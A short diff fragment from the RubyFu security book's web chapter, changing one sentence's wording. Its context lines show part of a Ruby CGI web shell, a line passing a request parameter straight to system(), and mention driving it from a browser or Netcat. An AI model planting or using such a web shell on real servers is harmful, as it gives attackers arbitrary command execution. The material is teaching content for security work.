rubyfu/RubyFu/module_0x4__web_kung_fu/README.md

 puts cgi.header
 system(cgi['cmd'])
 ```
-Now you can simply use browser, netcat or WebShellConsole[^1] to execute your commands.
+Now you can simply use a web browser, Netcat or WebShellConsole[^1] to execute your commands.
 ex.
 **Browser**
 ```